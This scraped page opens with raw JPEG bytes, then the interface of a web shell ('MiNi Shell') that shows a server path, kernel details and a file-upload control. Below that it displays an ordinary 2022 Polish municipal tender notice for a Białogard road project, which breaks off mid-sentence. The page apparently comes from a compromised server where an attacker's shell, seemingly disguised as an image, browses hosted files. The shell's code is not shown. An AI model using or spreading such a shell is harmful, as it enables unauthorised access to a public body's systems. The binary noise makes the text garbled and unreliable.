JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220615/0021015701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji inżyniera kontraktu w ramach inwestycji pn.: „Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO BIAŁOGARD - URZĄD MIASTA BIAŁOGARD</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920452</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białogard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943579100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um.zamowienia.publiczne@bialogard.info</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.bialogard.info</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji inżyniera kontraktu w ramach inwestycji pn.: „Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-68ea3498-ec79-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00210157</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020789/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Pełnienie funkcji inżyniera kontraktu w ramach inwestycji pn.: „Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.bialogard.info/artykuly/2975/prowadzone-postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: um.zamowienia.publiczne@bialogard.info.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>2.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji użytkownika systemu miniPortal-ePUAP: https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf oraz Warunkach korzystania <br/>z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając<br/>z miniPortalu przestrzegać postanowień tego regulaminu.<br/>4.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>6.	W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy<br/>i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia w BZP lub nr referencyjnym postępowania: IZP.271.1.10.2022.<br/>7.	Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: um.zamowienia.publiczne@bialogard.info . <br/>8.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: um.zamowienia.publiczne@bialogard.info . <br/>9.	Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>10. W przypadku braku potwierdzenia otrzymania korespondencji przez Wykonawcę, Zamawiający domniema, że korespondencja wysłana przez Zamawiającego na adres e-mail, podany przez Wykonawcę, została mu doręczona w sposób umożliwiający zapoznanie się z jej treścią.<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>13. Zamawiający nie ponosi odpowiedzialności z tytułu nieotrzymania przez Wykonawcę informacji związanych z prowadzonym postępowaniem w przypadku wskazania przez Wykonawcę w ofercie np. błędnego adresu lub adresu poczty elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27.4.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 04.05.2016, str. 1), dalej RODO, informuję, że:<br/>1)	Administratorem Pani/Pana danych osobowych jest Miasto Białogard, ul. 1 Maja 18, kod pocztowy <br/>78-200, e-mail: um.sekretariat@bialogard.info, tel. 94 357 91 00. <br/>2)	Dane kontaktowe do inspektora ochrony danych: Urząd Miasta Białogard, ul. 1 Maja 18, kod pocztowy 78-200, adres e-mail: iodumb@bialogard.info, nr telefonu 94 357 92 13. <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. Pełnienie funkcji inżyniera kontraktu w ramach inwestycji pn.: „Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów”, IZP.271.1.10.2022, prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1 Pzp.<br/>4)	Odbiorcami Pani/Pana danych osobowych będą:<br/> osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych <br/>(Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>	Organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa,<br/>	Inne podmioty, które na podstawie stosownych umów podpisanych z Urzędem Miasta Białogard przetwarzają dane osobowe dla których administratorem jest Miasto Białogard, w tym operator pocztowy, firmy serwisujące programy komputerowe, instytucje finansowe.<br/>5)	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego / organizacji międzynarodowej.<br/>6)	Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów zgodnie z przepisami prawa w tym instrukcja kancelaryjną i ustawą Pzp (10 lat). <br/>7)	Posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych. Skorzystanie z prawa do sprostowania nie może skutkować zmiana wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących <br/>8)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. Państwa dane nie są przetwarzane w sposób zautomatyzowany i nie są przetwarzane w formie profilowania</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1)	Nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.1.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamówienie dotyczy usługi pełnienia funkcji inżyniera kontraktu w ramach inwestycji pn. „Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów (działki ewid. nr 468/1; 726; 743; 745/1; 865; 864; 467; 579/2; 579/4; 580; 684; 707/3; 727; 711; 698; 685; 860; 868; 1; 469; 850; 578/5; 606; 585; 639/9; 802/1; 449/1; 455 obręb 0009 m. Białogard).<br/>2.	Przedmiotem zamówienia jest usługa pełnienia funkcji inżyniera kontraktu w ramach zadania dotyczącego przebudowy ul. Moniuszki i Piastów w Białogardzie, obejmująca świadczenie usług związanych z zarządzaniem, koordynowaniem, rozliczaniem, kontrolą i nadzorem nad realizacją inwestycji. Roboty budowlane (realizowane w formule zaprojektuj i wybuduj), które podlegać będą nadzorowi inżyniera kontraktu obejmują:<br/>2.1	Opracowanie dokumentacji projektowej, w tym:<br/>2.1.1	Koncepcji projektowej;<br/>2.1.2	Projektu budowlanego „Przebudowy infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów” zawierającego wszystkie niezbędne do realizacji robót budowlanych zawartych w programie funkcjonalno-użytkowym branże, tj. drogową, instalacji sanitarnych, instalacji elektroenergetycznych, instalacji teletechnicznych, projekt (tymczasowej i docelowej) organizacji ruchu, projekt zieleni wraz z uzyskaniem wszelkich niezbędnych materiałów do wykonania prac projektowych, w szczególności aktualnych map i opinii geotechnicznych (w tym badań gruntu), warunków technicznych, wypisów i wyrysów, z uzyskaniem stosownych pozwoleń, uzgodnień, opinii i decyzji administracyjnych pozwalających na realizację robót budowlanych wymaganych obowiązującymi przepisami (w tym opracowanie operatu wodnoprawnego oraz uzyskanie pozwolenia wodnoprawnego; uzyskanie decyzji administracyjnych zezwalających na wycinkę) oraz uzyskanie ostatecznej decyzji o pozwoleniu na budowę;<br/>2.1.3	Projektu wykonawczego stanowiącego rozwiniecie opracowania jw., w postaci odrębnych opracowań branżowych;<br/>2.1.4	Przedmiarów robót dla poszczególnych branż;<br/>2.1.5	Kosztorysów robót dla poszczególnych branż;<br/>2.1.6	Specyfikacji technicznych wykonania i odbioru robót budowlanych;<br/>2.1.7	Harmonogramu finansowego i rzeczowego realizacji robót budowlanych.<br/>2.1.8	Zapewnienie pełnienia przez projektantów czynności nadzoru autorskiego nad wykonywaniem robót budowlanych.<br/>2.2	Wykonanie robót budowlanych zgodnie z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, decyzjami administracyjnymi i obowiązującymi przepisami, wykonanie dokumentacji powykonawczej oraz uzyskanie pozwolenia na użytkowanie (o ile taki obowiązek został nałożony obowiązującymi przepisami i/lub wydanymi decyzjami zezwalającymi na wykonanie robót budowlanych).<br/>W ramach robót budowlanych (zgodnie z programem funkcjonalno-użytkowym) przewidziano przebudowę ul. Moniuszki i Piastów w Białogardzie, w tym:<br/>2.2.1	Rozbiórkę istniejących nawierzchni wraz z wycinką drzew;<br/>2.2.2	Przebudowę nawierzchni jezdni i zatok autobusowych, chodników i zjazdów z sąsiadujących posesji wraz z budową miejsc postojowych;<br/>2.2.3	Przebudowę sieci instalacji oświetlenia drogowego;<br/>2.2.4	Budowę sieci instalacji kanalizacji deszczowej z wylotem do cieku wodnego – Kanał Białogardzki (lub w przypadku braku takiej możliwości włączenie części sieci do istniejącej kanalizacji deszczowej);<br/>2.2.5	Budowę sieci instalacji kanalizacji teletechnicznej.<br/>2.2.6	Uporządkowanie istniejącej oraz nowe nasadzenia zieleni.<br/>2.3	Zakres obowiązków Inżyniera Kontraktu obejmuje:<br/>1)	przestrzeganie przepisów ustawy o ochronie danych osobowych (Dz. U. 2019 poz. 1781 z dn. 19.09.2019 r. z późn. zm.) – zgodnie z § 3 wzoru umowy,<br/>2)	monitorowanie i kontrola przebiegu procesu poprzedzającego realizację inwestycji (uzyskanie uzgodnień, opracowanie koncepcji i dokumentacji projektowej wg pkt 2.1, uzyskanie pozwolenia na budowę, dokonanie wymaganych przepisami zgłoszeń),<br/>3)	obowiązki w trakcie prowadzenia robót:<br/>a)	obecność na terenie budowy w trakcie trwania realizacji robót budowlanych, co najmniej raz w tygodniu oraz dostępność na każde wezwanie zamawiającego,<br/>b)	nadzorowanie prac wykonywanych przez uprawnionych inspektorów nadzoru, zgodnie <br/>z wymogami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r., poz. 2351 tj. z 20.12.2021 r. z późn. zm.) i warunkami zapisanymi w decyzjach administracyjnych;<br/>c)	reprezentowanie zamawiającego w kontaktach z instytucjami i podmiotami trzecimi w sprawach związanych z realizacją inwestycji;<br/>d)	bieżącą kontrolę jakości wykonywanych robót oraz wbudowanych materiałów, zgodnie <br/>z wymaganiami specyfikacji technicznej wykonania i odbioru robót, dokumentacji projektowej oraz praktyki inżynierskiej;<br/>e)	bieżące informowanie zamawiającego o wszelkich zagrożeniach występujących podczas realizacji robót, które mogą mieć wpływ na wydłużenie czasu wykonania lub zwiększenia kosztów;<br/>f)	kontrolowanie przestrzegania przez wykonawcę robót zasad bezpieczeństwa pracy i utrzymania porządku na terenie budowy;<br/>g)	organizowanie oraz przewodniczenie cotygodniowym radom budowy dotyczącym postępu robót, w których udział biorą przedstawiciele wszystkich stron zaangażowanych w realizację zadania, oraz sporządzanie protokołów z tych narad i przekazywania ich zamawiającemu w terminie 3 dni;<br/>h)	monitorowanie postępu robót poprzez sprawdzenie ich rzeczywistego zaawansowania <br/>i zgodności realizacji z obowiązującym harmonogramem robót;<br/>i)	kontrolowanie sposobu składowania i przechowywania materiałów;<br/>j)	nadzorowanie i weryfikowanie obmiarów robót wykonywanych przez wykonawcę robót;<br/>k)	dokonywanie odbioru robót zanikających i ulegających zakryciu;<br/>l)	sprawdzanie wykonywanych robót i powiadamianie wykonawcy robót o wykrytych wadach oraz określenie zakresu koniecznych do wykonania robót poprawkowych;<br/>m)	poświadczanie usunięcia wad przez wykonawcę robót;<br/>n)	sprawdzanie kalkulacji szczegółowych lub kosztorysów przedkładanych przez wykonawcę lub podwykonawców robót;<br/>o)	sprawdzanie faktur Wykonawcy oraz dokumentów załączonych do rozliczenia robót;<br/>p)	dochodzenie oraz egzekwowanie od dostawców lub wykonawców należytych odszkodowań lub kar umownych za nienależyte lub nieterminowe wykonanie zobowiązań umownych;<br/>q)	poświadczenia terminu zakończenia robót;<br/>r)	sporządzanie dla zamawiającego wszelkich niezbędnych dokumentów i informacji do instytucji współfinansującej zadanie na roboty budowlane;<br/>s)	powiadamianie zamawiającego o wszelkich roszczeniach Wykonawcy robót oraz rozbieżności między dokumentacją a stanem faktycznym na terenie budowy;<br/>t)	nadzorowanie rozliczeń z Wykonawcą i podwykonawcami w tym zestawień rzeczowo-finansowych do odbiorów częściowych oraz opracowywanie raportów i sprawozdań na żądanie zamawiającego.<br/>4)	po zakończeniu budowy:<br/>a)	weryfikacja kompletności dokumentacji odbiorowej/powykonawczej przygotowanej przez Wykonawcę robót oraz zorganizowanie i przeprowadzenie odbioru końcowego robót;<br/>b)	dokonanie odbioru wykonanych robót związanych z usunięciem wad ujawnionych podczas odbioru końcowego;<br/>c)	uczestniczenie w rozliczeniu dofinansowania udzielonego ze środków publicznych;<br/>d)	przygotowanie dla potrzeb zamawiającego danych niezbędnych do sporządzenia dokumentów PT, OT;<br/>e)	przechowywanie i przekazanie zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez wykonawców robót po zakończeniu robót;<br/>f)	przekazanie zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej;<br/>g)	w czasie trwania gwarancji uczestniczenie w przeglądach raz w roku.<br/>3.	Zadanie pn.: “Przebudowa infrastruktury drogowej na terenie miasta Białogard poprzez przebudowę ul. Moniuszki i Piastów&#34;, dofinansowane jest z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamawiający przewiduje możliwość udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy zamówień polegających na powtórzeniu podobnych usług o wartości do kwoty 70 000,00 zł netto, zgodnych z przedmiotem niniejszego zamówienia.<br/>2.	Przez prace podobne Zamawiający rozumie usługi, których zakres jest zgodny z zakresem zamówienia podstawowego.<br/>3.	Szczegółowy zakres zamówienia określony zostanie w toku odrębnego postępowania o udzielenie zamówienia publicznego i może dotyczyć:<br/>1)	Pełnienia funkcji inżyniera kontraktu dla inwestycji z branży drogowej, instalacji sanitarnych i instalacji elektrycznych (jednej lub kilku branż łącznie);<br/>2)	Pełnienia funkcji inspektora 